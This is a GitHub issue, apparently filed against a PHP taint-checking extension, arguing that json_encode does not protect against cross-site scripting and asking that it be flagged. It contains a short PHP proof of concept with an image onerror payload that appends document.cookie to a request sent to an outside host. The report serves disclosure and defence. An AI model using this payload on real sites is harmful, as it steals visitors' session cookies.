Skip to content

json_encode is not safe to xss #39

Description

@gouchaoer

http://stackoverflow.com/questions/5913503/xss-creating-a-javascript-object-using-phps-json-encode/40230653#40230653

A poc to steal cookie:

$xss=<<<EOL
<img id='id' src='http://balabla.com/xss.php?'>
<img src=# onerror=document.getElementById('id').src+=document.cookie>
EOL;
$arr['xss']=$xss;
echo json_encode($arr);

Actually json_encode is widly used to escape js.
I suggest add json_encode to http://php.net/manual/en/taint.detail.basic.php

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions